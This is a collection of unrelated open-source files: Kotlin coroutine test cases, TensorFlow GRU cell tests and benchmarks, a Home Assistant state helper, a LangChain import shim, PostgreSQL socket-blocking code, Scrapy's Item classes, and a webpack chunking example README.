assertFailsWith<TestException> {
runBlockingTestOnTestScope {
launch {
throw TestException()
}
}
}
}
@Test
fun testCompletesOwnJob() {
var handlerCalled = false
runBlockingTestOnTestScope {
coroutineContext.job.invokeOnCompletion {
handlerCalled = true
}
}
assertTrue(handlerCalled)
}
@Test
fun testDoesNotCompleteGivenJob() {
var handlerCalled = false
val job = Job()
job.invokeOnCompletion {
handlerCalled = true
}
runBlockingTestOnTestScope(job) {
assertTrue(coroutineContext.job in job.children)
}
assertFalse(handlerCalled)
assertEquals(0, job.children.filter { it.isActive }.count())
}
@Test
fun testSuppressedExceptions() {
try {
runBlockingTestOnTestScope {
launch(SupervisorJob()) { throw TestException("x") }
launch(SupervisorJob()) { throw TestException("y") }
launch(SupervisorJob()) { throw TestException("z") }
throw TestException("w")
}
fail("should not be reached")
} catch (e: TestException) {
assertEquals("w", e.message)
val suppressed = e.suppressedExceptions +
(e.suppressedExceptions.firstOrNull()?.suppressedExceptions ?: emptyList())
assertEquals(3, suppressed.size)
assertEquals("x", suppressed[0].message)
assertEquals("y", suppressed[1].message)
assertEquals("z", suppressed[2].message)
}
}
@Test
fun testScopeRunTestExceptionHandler(): TestResult {
val scope = TestCoroutineScope()
return testResultMap({
try {
it()
fail("should not be reached")
} catch (e: TestException) {
// expected
}
}) {
scope.runTest {
launch(SupervisorJob()) { throw TestException("x") }
}
}
}
@Test
fun testBackgroundWorkBeingRun() = runBlockingTestOnTestScope {
var i = 0
var j = 0
backgroundScope.launch {
yield()
++i
}
backgroundScope.launch {
yield()
delay(10)
++j
}
assertEquals(0, i)
assertEquals(0, j)
delay(1)
assertEquals(1, i)
assertEquals(0, j)
delay(10)
assertEquals(1, i)
assertEquals(1, j)
}
@Test
fun testBackgroundWorkCancelled() {
var cancelled = false
runBlockingTestOnTestScope {
var i = 0
backgroundScope.launch {
yield()
try {
while (isActive) {
++i
yield()
}
} catch (e: CancellationException) {
cancelled = true
}
}
repeat(5) {
assertEquals(i, it)
yield()
}
}
assertTrue(cancelled)
}
@Test
fun testBackgroundWorkTimeControl(): TestResult = runBlockingTestOnTestScope {
var i = 0
var j = 0
backgroundScope.launch {
yield()
while (true) {
++i
delay(100)
}
}
backgroundScope.launch {
yield()
while (true) {
++j
delay(50)
}
}
advanceUntilIdle() // should do nothing, as only background work is left.
assertEquals(0, i)
assertEquals(0, j)
val job = launch {
delay(1)
// the background work scheduled for earlier gets executed before the normal work scheduled for later does
assertEquals(1, i)
assertEquals(1, j)
}
job.join()
advanceTimeBy(199) // should work the same for the background tasks
assertEquals(2, i)
assertEquals(4, j)
advanceUntilIdle() // once again, should do nothing
assertEquals(2, i)
assertEquals(4, j)
runCurrent() // should behave the same way as for the normal work
assertEquals(3, i)
assertEquals(5, j)
launch {
delay(1001)
assertEquals(13, i)
assertEquals(25, j)
}
advanceUntilIdle() // should execute the normal work, and with that, the background one, too
}
@Test
fun testBackgroundWorkErrorReporting() {
var testFinished = false
val exception = RuntimeException("x")
try {
runBlockingTestOnTestScope {
backgroundScope.launch {
throw exception
}
delay(1000)
testFinished = true
}
fail("unreached")
} catch (e: Throwable) {
assertSame(e, exception)
assertTrue(testFinished)
}
}
@Test
fun testBackgroundWorkFinalizing() {
var taskEnded = 0
val nTasks = 10
try {
runBlockingTestOnTestScope {
repeat(nTasks) {
backgroundScope.launch {
try {
while (true) {
delay(1)
}
} finally {
++taskEnded
if (taskEnded <= 2)
throw TestException()
}
}
}
delay(100)
throw TestException()
}
fail("unreached")
} catch (e: TestException) {
assertEquals(2, e.suppressedExceptions.size)
assertEquals(nTasks, taskEnded)
}
}
@Test
fun testExampleBackgroundJob1() = runBlockingTestOnTestScope {
val myFlow = flow {
yield()
var i = 0
while (true) {
emit(++i)
delay(1)
}
}
val stateFlow = myFlow.stateIn(backgroundScope, SharingStarted.Eagerly, 0)
var j = 0
repeat(100) {
assertEquals(j++, stateFlow.value)
delay(1)
}
}
@Test
fun testExampleBackgroundJob2() = runBlockingTestOnTestScope {
val channel = Channel<Int>()
backgroundScope.launch {
var i = 0
while (true) {
channel.send(i++)
}
}
repeat(100) {
assertEquals(it, channel.receive())
}
}
@Test
fun testAsyncFailureInBackgroundReported() =
try {
runBlockingTestOnTestScope {
backgroundScope.async {
throw TestException("x")
}
backgroundScope.produce<Unit> {
throw TestException("y")
}
delay(1)
throw TestException("z")
}
fail("unreached")
} catch (e: TestException) {
assertEquals("z", e.message)
assertEquals(setOf("x", "y"), e.suppressedExceptions.map { it.message }.toSet())
}
@Test
fun testNoDuplicateExceptions() =
try {
runBlockingTestOnTestScope {
backgroundScope.launch {
throw TestException("x")
}
delay(1)
throw TestException("y")
}
fail("unreached")
} catch (e: TestException) {
assertEquals("y", e.message)
assertEquals(listOf("x"), e.suppressedExceptions.map { it.message })
}
}
|
kotlin
|
github
|
https://github.com/Kotlin/kotlinx.coroutines
|
kotlinx-coroutines-test/jvm/test/migration/RunBlockingTestOnTestScopeTest.kt
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Block GRU module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
from tensorflow.contrib.rnn.python.ops import core_rnn_cell_impl
from tensorflow.contrib.rnn.python.ops import gru_ops
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
class GRUBlockCellTest(test.TestCase):
_use_gpu = False
def testNoneDimsWithDynamicRNN(self):
with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
batch_size = 4
cell_size = 5
input_size = 6
num_steps = 7
cell = gru_ops.GRUBlockCell(cell_size)
x = array_ops.placeholder(dtypes.float32, shape=(None, None, input_size))
_, output = rnn.dynamic_rnn(
cell, x, time_major=True, dtype=dtypes.float32)
sess.run(variables.global_variables_initializer())
feed = {}
feed[x] = np.random.randn(num_steps, batch_size, input_size)
sess.run(output, feed)
def testBlockGRUToGRUCellSingleStep(self):
with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
batch_size = 4
cell_size = 5
input_size = 6
seed = 1994
initializer = init_ops.random_uniform_initializer(-0.01, 0.01, seed=seed)
# Inputs
x = array_ops.zeros([batch_size, input_size])
h = array_ops.zeros([batch_size, cell_size])
# Values for the inputs.
x_value = np.random.rand(batch_size, input_size)
h_value = np.random.rand(batch_size, cell_size)
# Output from the basic GRU cell implementation.
with vs.variable_scope("basic", initializer=initializer):
output = core_rnn_cell_impl.GRUCell(cell_size)(x, h)
sess.run([variables.global_variables_initializer()])
basic_res = sess.run([output], {x: x_value, h: h_value})
# Output from the block GRU cell implementation.
with vs.variable_scope("block", initializer=initializer):
output = gru_ops.GRUBlockCell(cell_size)(x, h)
sess.run([variables.global_variables_initializer()])
block_res = sess.run([output], {x: x_value, h: h_value})
self.assertEqual(len(block_res), len(basic_res))
for block, basic in zip(block_res, basic_res):
self.assertAllClose(block, basic)
def testBlockGRUToGRUCellMultiStep(self):
with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
batch_size = 2
cell_size = 3
input_size = 3
time_steps = 4
# Random initializers.
seed = 1994
initializer = init_ops.random_uniform_initializer(-0.01, 0.01, seed=seed)
np.random.seed(seed)
# Inputs
concat_x = array_ops.placeholder(
dtypes.float32, shape=(time_steps, batch_size, input_size))
h = array_ops.zeros([batch_size, cell_size])
# Values for the inputs.
x_values = np.random.rand(time_steps, batch_size, input_size)
h_value = np.random.rand(batch_size, cell_size)
# Output from the block GRU cell implementation.
with vs.variable_scope("block", initializer=initializer):
cell = gru_ops.GRUBlockCell(cell_size)
outputs_dynamic, state_dynamic = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
feeds = {concat_x: x_values, h: h_value}
sess.run([variables.global_variables_initializer()])
block_res = sess.run([outputs_dynamic, state_dynamic], feeds)
# Output from the basic GRU cell implementation.
with vs.variable_scope("basic", initializer=initializer):
cell = core_rnn_cell_impl.GRUCell(cell_size)
outputs_dynamic, state_dynamic = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
feeds = {concat_x: x_values, h: h_value}
sess.run([variables.global_variables_initializer()])
basic_res = sess.run([outputs_dynamic, state_dynamic], feeds)
# Check the lengths of the outputs_dynamic, and states.
self.assertEqual(len(block_res), len(basic_res))
self.assertEqual(len(block_res[0]), len(basic_res[0]))
self.assertEqual(len(block_res[1]), len(basic_res[1]))
# Check the outputs_dynamic values.
for block_output, basic_output in zip(block_res[0], basic_res[0]):
self.assertAllClose(block_output, basic_output)
# Check the state_dynamic value.
self.assertAllClose(block_res[1], block_res[1])
def testDerivativeOfBlockGRUToGRUCellSingleStep(self):
with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
batch_size = 2
cell_size = 3
input_size = 4
seed = 1994
initializer = init_ops.random_uniform_initializer(-0.01, 0.01, seed=seed)
np.random.seed(seed)
# Inputs
x = array_ops.zeros([batch_size, input_size])
h = array_ops.zeros([batch_size, cell_size])
# Values for the inputs.
x_value = np.random.rand(batch_size, input_size)
h_value = np.random.rand(batch_size, cell_size)
# Gradients from the block GRU cell implementation.
with vs.variable_scope("block", initializer=initializer):
output = gru_ops.GRUBlockCell(cell_size)(x, h)
sess.run([variables.global_variables_initializer()])
all_variables = variables.global_variables()[0:4]
[w_ru, b_ru, w_c, b_c] = all_variables
d_new_h_wrt_x = gradients_impl.gradients([output], x)
d_new_h_wrt_h = gradients_impl.gradients([output], h)
d_new_h_wrt_w_ru = gradients_impl.gradients([output], w_ru)
d_new_h_wrt_w_c = gradients_impl.gradients([output], w_c)
d_new_h_wrt_b_ru = gradients_impl.gradients([output], b_ru)
d_new_h_wrt_b_c = gradients_impl.gradients([output], b_c)
d_block_res = sess.run([
d_new_h_wrt_x, d_new_h_wrt_h, d_new_h_wrt_w_ru, d_new_h_wrt_w_c,
d_new_h_wrt_b_ru, d_new_h_wrt_b_c
], {x: x_value,
h: h_value})
# Gradients from the basic GRU cell implementation.
with vs.variable_scope("basic", initializer=initializer):
output = core_rnn_cell_impl.GRUCell(cell_size)(x, h)
sess.run([variables.global_variables_initializer()])
all_variables = variables.global_variables()[4:8]
[w_ru, b_ru, w_c, b_c] = all_variables
d_new_h_wrt_x = gradients_impl.gradients([output], x)
d_new_h_wrt_h = gradients_impl.gradients([output], h)
d_new_h_wrt_w_ru = gradients_impl.gradients([output], w_ru)
d_new_h_wrt_w_c = gradients_impl.gradients([output], w_c)
d_new_h_wrt_b_ru = gradients_impl.gradients([output], b_ru)
d_new_h_wrt_b_c = gradients_impl.gradients([output], b_c)
d_basic_res = sess.run([
d_new_h_wrt_x, d_new_h_wrt_h, d_new_h_wrt_w_ru, d_new_h_wrt_w_c,
d_new_h_wrt_b_ru, d_new_h_wrt_b_c
], {x: x_value,
h: h_value})
# Check lengths of derivative results.
self.assertEqual(len(d_block_res), len(d_basic_res))
# Check the value of every derivative result.
for block, basic in zip(d_block_res, d_basic_res):
self.assertAllClose(block, basic)
def testDerivativeOfBlockGRUToGRUCellMultiSteps(self):
batch_size = 2
cell_size = 3
input_size = 4
time_steps = 2
with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
# Random initializers.
seed = 1994
initializer = init_ops.random_uniform_initializer(-0.01, 0.01, seed=seed)
np.random.seed(seed)
# Inputs
concat_x = array_ops.placeholder(
dtypes.float32, shape=(time_steps, batch_size, input_size))
h = array_ops.zeros([batch_size, cell_size])
# Values for the inputs.
x_values = np.random.rand(time_steps, batch_size, input_size)
h_value = np.random.rand(batch_size, cell_size)
feeds = {concat_x: x_values, h: h_value}
# Gradients from the block GRU cell implementation.
with vs.variable_scope("block", initializer=initializer):
cell = gru_ops.GRUBlockCell(cell_size)
outputs_dynamic, _ = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
grad_output_wrt_x = gradients_impl.gradients([outputs_dynamic[0]],
concat_x)
grad_output_wrt_h = gradients_impl.gradients([outputs_dynamic[0]], h)
sess.run([variables.global_variables_initializer()])
block_grad_res_x, block_grad_res_h = sess.run(
[grad_output_wrt_x, grad_output_wrt_h], feeds)
# Gradients from the basic GRU cell implementation.
with vs.variable_scope("basic", initializer=initializer):
cell = core_rnn_cell_impl.GRUCell(cell_size)
outputs_dynamic, _ = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
grad_output_wrt_x = gradients_impl.gradients([outputs_dynamic[0]],
concat_x)
grad_output_wrt_h = gradients_impl.gradients([outputs_dynamic[0]], h)
sess.run([variables.global_variables_initializer()])
basic_grad_res_x, basic_grad_res_h = sess.run(
[grad_output_wrt_x, grad_output_wrt_h], feeds)
# Check derivatives values of the outputs wrt to x.
self.assertEqual(len(block_grad_res_x), len(basic_grad_res_x))
# Check derivatives values of the outputs wrt to h.
for block, basic in zip(block_grad_res_x, basic_grad_res_x):
self.assertAllClose(block, basic)
# Check derivatives values of the outputs wrt to x.
self.assertEqual(len(block_grad_res_h), len(basic_grad_res_h))
# Check derivatives values of the outputs wrt to h.
for block, basic in zip(block_grad_res_h, basic_grad_res_h):
self.assertAllClose(block, basic)
def testGradient(self):
with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
batch_size = 1
cell_size = 3
input_size = 2
# Inputs
x = array_ops.zeros([batch_size, input_size])
h = array_ops.zeros([batch_size, cell_size])
output = gru_ops.GRUBlockCell(cell_size)(x, h)
sess.run([variables.global_variables_initializer()])
all_variables = variables.global_variables()
[w_ru, b_ru, w_c, b_c] = all_variables[:4]
error_x = gradient_checker.compute_gradient_error(
x, (batch_size, input_size), output[0], (batch_size, cell_size))
error_h = gradient_checker.compute_gradient_error(h,
(batch_size, cell_size),
output[0],
(batch_size, cell_size))
error_w_ru = gradient_checker.compute_gradient_error(
w_ru, (input_size + cell_size, 2 * cell_size), output[0],
(batch_size, cell_size))
error_w_c = gradient_checker.compute_gradient_error(
w_c, (input_size + cell_size, cell_size), output[0],
(batch_size, cell_size))
error_b_ru = gradient_checker.compute_gradient_error(
b_ru, (2 * cell_size,), output[0], (batch_size, cell_size))
error_b_c = gradient_checker.compute_gradient_error(
b_c, (cell_size,), output[0], (batch_size, cell_size))
eps = 1e-4
self.assertLess(error_x, eps)
self.assertLess(error_h, eps)
self.assertLess(error_w_ru, eps)
self.assertLess(error_w_c, eps)
self.assertLess(error_b_ru, eps)
self.assertLess(error_b_c, eps)
class GRUBlockCellGpuTest(GRUBlockCellTest):
_use_gpu = True
#### Benchmarking GRUBlockCell vs GRUCell.
def time_taken_by_op(op, sess, num_runs=50):
"""Time taken by the Op."""
for _ in range(2):
sess.run([op])
start_time = time.time()
for _ in range(num_runs):
sess.run([op])
end_time = time.time()
time_taken = end_time - start_time
return time_taken
def training_gru_block_vs_gru_cell(batch_size,
cell_size,
input_size,
time_steps,
use_gpu=False,
iters=30):
"""Benchmark training speed between GRUBlockCell vs GRUCell."""
ops.reset_default_graph()
with session.Session(graph=ops.Graph()) as sess:
# Specify the device which is been used.
with ops.device("/cpu:0" if not use_gpu else "/gpu:0"):
# Random initializers.
seed = 1994
initializer = init_ops.random_uniform_initializer(-1, 1, seed=seed)
np.random.seed(seed)
# Inputs
concat_x = vs.get_variable("concat_x",
[time_steps, batch_size, input_size])
h = vs.get_variable("h", [batch_size, cell_size])
y = vs.get_variable("y", [time_steps, batch_size, cell_size])
# Output from the basic GRU cell implementation.
with vs.variable_scope("basic", initializer=initializer):
cell = core_rnn_cell_impl.GRUCell(cell_size)
outputs_dynamic, _ = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
sess.run([variables.global_variables_initializer()])
cost = math_ops.reduce_mean(math_ops.square(outputs_dynamic - y))
learning_rate = 0.01
optimizer = gradient_descent.GradientDescentOptimizer(
learning_rate).minimize(cost)
# time for a training step.
basic_time_training = time_taken_by_op(optimizer, sess, iters)
# Output from the basic GRU cell implementation.
with vs.variable_scope("block", initializer=initializer):
cell = gru_ops.GRUBlockCell(cell_size)
outputs_dynamic, _ = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
sess.run([variables.global_variables_initializer()])
cost = math_ops.reduce_mean(math_ops.square(outputs_dynamic - y))
learning_rate = 0.01
optimizer = gradient_descent.GradientDescentOptimizer(
learning_rate).minimize(cost)
# time for a training step.
block_time_training = time_taken_by_op(optimizer, sess, iters)
performance_training = (
basic_time_training - block_time_training) * 100 / basic_time_training
print(",".join([
str(batch_size), str(cell_size), str(input_size), str(time_steps), str(
use_gpu), str(basic_time_training), str(block_time_training), str(
performance_training)
]))
return basic_time_training, block_time_training
def inference_gru_block_vs_gru_cell(batch_size,
cell_size,
input_size,
time_steps,
use_gpu=False,
iters=30):
"""Benchmark inference speed between GRUBlockCell vs GRUCell."""
ops.reset_default_graph()
with session.Session(graph=ops.Graph()) as sess:
with ops.device("/cpu:0" if not use_gpu else "/gpu:0"):
# Random initializers.
seed = 1994
initializer = init_ops.random_uniform_initializer(-1, 1, seed=seed)
np.random.seed(seed)
# Inputs
concat_x = vs.get_variable("concat_x",
[time_steps, batch_size, input_size])
h = vs.get_variable("h", [batch_size, cell_size])
# Output from the basic GRU cell implementation.
with vs.variable_scope("basic", initializer=initializer):
cell = core_rnn_cell_impl.GRUCell(cell_size)
outputs_dynamic, _ = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
sess.run([variables.global_variables_initializer()])
basic_time_inference = time_taken_by_op(outputs_dynamic, sess, iters)
# Output from the block GRU cell implementation.
with vs.variable_scope("block", initializer=initializer):
cell = gru_ops.GRUBlockCell(cell_size)
outputs_dynamic, _ = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
sess.run([variables.global_variables_initializer()])
block_time_inference = time_taken_by_op(outputs_dynamic, sess, iters)
performance_inference = (basic_time_inference - block_time_inference
) * 100 / basic_time_inference
print(",".join([
str(batch_size), str(cell_size), str(input_size), str(time_steps), str(
use_gpu), str(basic_time_inference), str(block_time_inference), str(
performance_inference)
]))
return basic_time_inference, block_time_inference
def single_bprop_step_gru_block_vs_gru_cell(batch_size,
cell_size,
input_size,
use_gpu=False,
iters=30):
"""Benchmark single bprop step speed between GRUBlockCell vs GRUCell."""
ops.reset_default_graph()
with session.Session(graph=ops.Graph()) as sess:
with ops.device("/cpu:0" if not use_gpu else "/gpu:0"):
initializer = init_ops.random_uniform_initializer(-1, 1, seed=1989)
# Inputs
x = vs.get_variable("x", [batch_size, input_size])
h = vs.get_variable("h", [batch_size, cell_size])
# Output from the basic GRU cell implementation.
with vs.variable_scope("basic", initializer=initializer):
output = core_rnn_cell_impl.GRUCell(cell_size)(array_ops.identity(x),
array_ops.identity(h))
sess.run([variables.global_variables_initializer()])
grad_output_wrt_input = gradients_impl.gradients([output], h)
basic_time_bprop = time_taken_by_op(grad_output_wrt_input, sess, iters)
# Output from the block GRU cell implementation.
with vs.variable_scope("block", initializer=initializer):
output = gru_ops.GRUBlockCell(cell_size)(array_ops.identity(x),
array_ops.identity(h))
sess.run([variables.global_variables_initializer()])
grad_output_wrt_input = gradients_impl.gradients([output], h)
block_time_bprop = time_taken_by_op(grad_output_wrt_input, sess, iters)
performance_inference = (
basic_time_bprop - block_time_bprop) * 100 / basic_time_bprop
print(",".join([
str(batch_size), str(cell_size), str(input_size), str(use_gpu), str(
basic_time_bprop), str(block_time_bprop), str(performance_inference)
]))
return basic_time_bprop, block_time_bprop
class BenchmarkGRUBlock(test.Benchmark):
def benchmarkTrainingBlockGRUVsGRUCell(self):
print("Comparison GRUBlockCell vs GRUCell")
print("--------------------------------------------------------------")
print("Training speed GRUBlockCell vs GRUCell")
print("batch_size, cell_size, input_size, time_steps, GPU, "
"basic_time_training, block_time_training, performance_training[%]")
iters = 10
for use_gpu in [True, False]:
for batch_size in [1, 32, 128]:
for cell_size in [128, 512]:
for input_size in [128, 512]:
for time_steps in [50]:
basic_time, block_time = training_gru_block_vs_gru_cell(
batch_size, cell_size, input_size, time_steps, use_gpu, iters)
self.report_benchmark(
name="GRUCell_training_time_BS%i_CS%i_IS%i_TS%i_gpu_%s" %
(batch_size, cell_size, input_size, time_steps, use_gpu),
iters=iters,
wall_time=basic_time)
self.report_benchmark(
name="GRUBlockCell_training_time_BS%i_CS%i_IS%i_TS%i_gpu_%s" %
(batch_size, cell_size, input_size, time_steps, use_gpu),
iters=iters,
wall_time=block_time)
def benchmarkInferenceBlockGRUVsGRUCell(self):
print("--------------------------------------------------------------")
print("Inference speed GRUBlockCell vs GRUCell")
print(
"batch_size, cell_size, input_size, time_steps, GPU, "
"basic_time_inference, block_time_inference, performance_inference[%]")
iters = 10
for use_gpu in [True, False]:
for batch_size in [1, 32, 128]:
for cell_size in [128, 512]:
for input_size in [128, 512]:
for time_steps in [50]:
basic_time, block_time = inference_gru_block_vs_gru_cell(
batch_size, cell_size, input_size, time_steps, use_gpu, iters)
self.report_benchmark(
name="GRUCell_inference_time_BS%i_CS%i_IS%i_TS%i_gpu_%s" %
(batch_size, cell_size, input_size, time_steps, use_gpu),
iters=iters,
wall_time=basic_time)
self.report_benchmark(
name="GRUBlockCell_inference_time_BS%i_CS%i_IS%i_TS%i_gpu_%s"
% (batch_size, cell_size, input_size, time_steps, use_gpu),
iters=iters,
wall_time=block_time)
def benchmarkSingleBpropStepBlockGRUVsGRUCell(self):
print("--------------------------------------------------------------")
print("Single bprop step speed GRUBlockCell vs GRUCell")
print("batch_size, cell_size, input_size, GPU, basic_time, "
"block_time, performance_inference[%]")
iters = 10
for use_gpu in [True, False]:
for batch_size in [1, 32, 128]:
for cell_size in [128, 512]:
for input_size in [128, 512]:
basic_time, block_time = single_bprop_step_gru_block_vs_gru_cell(
batch_size, cell_size, input_size, use_gpu, iters)
self.report_benchmark(
name="GRUCell_Bprop_single_step_time_BS%i_CS%i_IS%i_gpu_%s" %
(batch_size, cell_size, input_size, use_gpu),
iters=iters,
wall_time=basic_time)
self.report_benchmark(
name="GRUBlockCell_Bprop_single_step_time_BS%i_CS%i_IS%i_gpu_%s"
% (batch_size, cell_size, input_size, use_gpu),
iters=iters,
wall_time=block_time)
print("--------------------------------------------------------------")
if __name__ == "__main__":
test.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""
homeassistant.helpers.state
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Helpers that help with state related things.
"""
import logging
from homeassistant import State
import homeassistant.util.dt as dt_util
from homeassistant.const import (
STATE_ON, STATE_OFF, SERVICE_TURN_ON, SERVICE_TURN_OFF, ATTR_ENTITY_ID)
_LOGGER = logging.getLogger(__name__)
# pylint: disable=too-few-public-methods, attribute-defined-outside-init
class TrackStates(object):
"""
Records the time when the with-block is entered. Will add all states
that have changed since the start time to the return list when with-block
is exited.
"""
def __init__(self, hass):
self.hass = hass
self.states = []
def __enter__(self):
self.now = dt_util.utcnow()
return self.states
def __exit__(self, exc_type, exc_value, traceback):
self.states.extend(self.hass.states.get_since(self.now))
def reproduce_state(hass, states, blocking=False):
""" Takes in a state and will try to have the entity reproduce it. """
if isinstance(states, State):
states = [states]
for state in states:
current_state = hass.states.get(state.entity_id)
if current_state is None:
continue
if state.state == STATE_ON:
service = SERVICE_TURN_ON
elif state.state == STATE_OFF:
service = SERVICE_TURN_OFF
else:
_LOGGER.warning("Unable to reproduce state for %s", state)
continue
service_data = dict(state.attributes)
service_data[ATTR_ENTITY_ID] = state.entity_id
hass.services.call(state.domain, service, service_data, blocking)
|
unknown
|
codeparrot/codeparrot-clean
| ||
from typing import TYPE_CHECKING, Any
from langchain_classic._api import create_importer
if TYPE_CHECKING:
from langchain_community.tools import EdenAiTextToSpeechTool
# Create a way to dynamically look up deprecated imports.
# Used to consolidate logic for raising deprecation warnings and
# handling optional imports.
DEPRECATED_LOOKUP = {"EdenAiTextToSpeechTool": "langchain_community.tools"}
_import_attribute = create_importer(__package__, deprecated_lookups=DEPRECATED_LOOKUP)
def __getattr__(name: str) -> Any:
"""Look up attributes dynamically."""
return _import_attribute(name)
__all__ = [
"EdenAiTextToSpeechTool",
]
|
python
|
github
|
https://github.com/langchain-ai/langchain
|
libs/langchain/langchain_classic/tools/edenai/audio_text_to_speech.py
|
/*-------------------------------------------------------------------------
*
* noblock.c
* set a file descriptor as blocking or non-blocking
*
* Portions Copyright (c) 1996-2026, PostgreSQL Global Development Group
* Portions Copyright (c) 1994, Regents of the University of California
*
* IDENTIFICATION
* src/port/noblock.c
*
*-------------------------------------------------------------------------
*/
#include "c.h"
#include <fcntl.h>
/*
* Put socket into nonblock mode.
* Returns true on success, false on failure.
*/
bool
pg_set_noblock(pgsocket sock)
{
#if !defined(WIN32)
int flags;
flags = fcntl(sock, F_GETFL);
if (flags < 0)
return false;
if (fcntl(sock, F_SETFL, (flags | O_NONBLOCK)) == -1)
return false;
return true;
#else
unsigned long ioctlsocket_ret = 1;
/* Returns non-0 on failure, while fcntl() returns -1 on failure */
return (ioctlsocket(sock, FIONBIO, &ioctlsocket_ret) == 0);
#endif
}
/*
* Put socket into blocking mode.
* Returns true on success, false on failure.
*/
bool
pg_set_block(pgsocket sock)
{
#if !defined(WIN32)
int flags;
flags = fcntl(sock, F_GETFL);
if (flags < 0)
return false;
if (fcntl(sock, F_SETFL, (flags & ~O_NONBLOCK)) == -1)
return false;
return true;
#else
unsigned long ioctlsocket_ret = 0;
/* Returns non-0 on failure, while fcntl() returns -1 on failure */
return (ioctlsocket(sock, FIONBIO, &ioctlsocket_ret) == 0);
#endif
}
|
c
|
github
|
https://github.com/postgres/postgres
|
src/port/noblock.c
|
"""
Scrapy Item
See documentation in docs/topics/item.rst
"""
from pprint import pformat
from collections import MutableMapping
from abc import ABCMeta
import six
from scrapy.utils.trackref import object_ref
class BaseItem(object_ref):
"""Base class for all scraped items."""
pass
class Field(dict):
"""Container of field metadata"""
class ItemMeta(ABCMeta):
def __new__(mcs, class_name, bases, attrs):
new_bases = tuple(base._class for base in bases if hasattr(base, '_class'))
_class = super(ItemMeta, mcs).__new__(mcs, 'x_' + class_name, new_bases, attrs)
fields = getattr(_class, 'fields', {})
new_attrs = {}
for n in dir(_class):
v = getattr(_class, n)
if isinstance(v, Field):
fields[n] = v
elif n in attrs:
new_attrs[n] = attrs[n]
new_attrs['fields'] = fields
new_attrs['_class'] = _class
return super(ItemMeta, mcs).__new__(mcs, class_name, bases, new_attrs)
class DictItem(MutableMapping, BaseItem):
fields = {}
def __init__(self, *args, **kwargs):
self._values = {}
if args or kwargs: # avoid creating dict for most common case
for k, v in six.iteritems(dict(*args, **kwargs)):
self[k] = v
def __getitem__(self, key):
return self._values[key]
def __setitem__(self, key, value):
if key in self.fields:
self._values[key] = value
else:
raise KeyError("%s does not support field: %s" %
(self.__class__.__name__, key))
def __delitem__(self, key):
del self._values[key]
def __getattr__(self, name):
if name in self.fields:
raise AttributeError("Use item[%r] to get field value" % name)
raise AttributeError(name)
def __setattr__(self, name, value):
if not name.startswith('_'):
raise AttributeError("Use item[%r] = %r to set field value" %
(name, value))
super(DictItem, self).__setattr__(name, value)
def __len__(self):
return len(self._values)
def __iter__(self):
return iter(self._values)
__hash__ = BaseItem.__hash__
def keys(self):
return self._values.keys()
def __repr__(self):
return pformat(dict(self))
def copy(self):
return self.__class__(self)
@six.add_metaclass(ItemMeta)
class Item(DictItem):
pass
|
unknown
|
codeparrot/codeparrot-clean
| ||
This example shows how to create an explicit vendor chunk as well as a common chunk for code shared among entry points. In this example, we have 3 entry points: `pageA`, `pageB`, and `pageC`. Those entry points share some of the same utility modules, but not others. This configuration will pull out any modules common to at least 2 bundles and place it in the `common` bundle instead, all while keeping the specified vendor libraries in their own bundle by themselves.
To better understand, here are the entry points and which utility modules they depend on:
- `pageA`
- `utility1`
- `utility2`
- `pageB`
- `utility2`
- `utility3`
- `pageC`
- `utility2`
- `utility3`
Given this configuration, webpack will produce the following bundles:
- `vendor`
- webpack runtime
- `vendor1`
- `vendor2`
- `common`
- `utility2`
- `utility3`
- `pageA`
- `pageA`
- `utility1`
- `pageB`
- `pageB`
- `pageC`
- `pageC`
With this bundle configuration, you would load your third party libraries, then your common application code, then your page-specific application code.
# webpack.config.js
```javascript
_{{webpack.config.js}}_
```
# dist/vendor.js
```javascript
_{{dist/vendor.js}}_
```
# dist/commons-utility2_js.js
``` javascript
_{{dist/commons-utility2_js.js}}_
```
# dist/commons-utility3_js.js
``` javascript
_{{dist/commons-utility3_js.js}}_
```
# dist/pageA.js
```javascript
_{{dist/pageA.js}}_
```
# dist/pageB.js
```javascript
_{{dist/pageB.js}}_
```
# dist/pageC.js
```javascript
_{{dist/pageC.js}}_
```
# Info
## Unoptimized
```
_{{stdout}}_
```
## Production mode
```
_{{production:stdout}}_
```
|
unknown
|
github
|
